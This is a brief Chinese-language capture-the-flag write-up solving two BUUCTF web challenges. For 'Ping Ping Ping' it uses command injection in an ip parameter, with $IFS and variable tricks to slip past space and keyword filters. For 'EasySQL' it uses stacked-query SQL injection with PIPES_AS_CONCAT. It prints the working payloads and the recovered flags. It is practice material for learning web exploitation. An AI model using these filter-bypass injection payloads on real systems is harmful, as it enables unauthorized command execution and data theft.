[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程

1、[GXYCTF2019]Ping Ping Ping 1

我们直接查看flag.php,提示我们/?ip= fxck your space!,无法直接查看flag.php,需要绕过空格。

[http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php](http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php "http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php")

<!--?php

$flag = "flag{0b46a562-1574-4bfe-87ae-356928a78954}";

?-->

2、[SUCTF 2019]EasySQL 1

随便输入一个数字回显Array ( [0] => 1 ),输入其他内容回显Nonono。

猜测该系统后台代码为:select $_POST['query'] || flag from flag [1] ,且那么直接在1前面拼接*,即*,1,解得flag:

flag{4151e8ed-491a-4c8b-bc72-c076522a4936}

1;show tables; 发现Flag表

构造payload为:1;set sql_mode=PIPES_AS_CONCAT;select 1 ,相当于是将select 1 和 select flag from Flag 的结果拼接在一起,也就是 select 1;的结果拼接select flag from Flag的结果。

相关推荐
yangSnowy2 小时前
PHP变量回收机制
开发语言·php
悠悠~飘2 小时前
22.php基础-类2
php
上海云盾商务经理杨杨2 小时前
付费网站的攻防战:2026年,如何破解并抵御爬虫攻击
网络·安全
emma羊羊2 小时前
【wordpress-wpdiscuz-rce】
网络·web安全·wordpress
夜勤月2 小时前
给AI装上“文件之手”:深入解析MCP文件系统服务的安全沙箱与读写实践
人工智能·安全
Sombra_Olivia3 小时前
Ubuntu22.04 安装Docker Vulhub遇到的问题
web安全·docker·vulhub
CRMEB系统商城3 小时前
CRMEB多商户系统(PHP)- 移动端二开之基本容器组件使用
运维·开发语言·小程序·php
2501_944521594 小时前
Flutter for OpenHarmony 微动漫App实战:图片加载实现
android·开发语言·前端·javascript·flutter·php
飞函安全4 小时前
飞函:为政企沟通加上“安全锁“
安全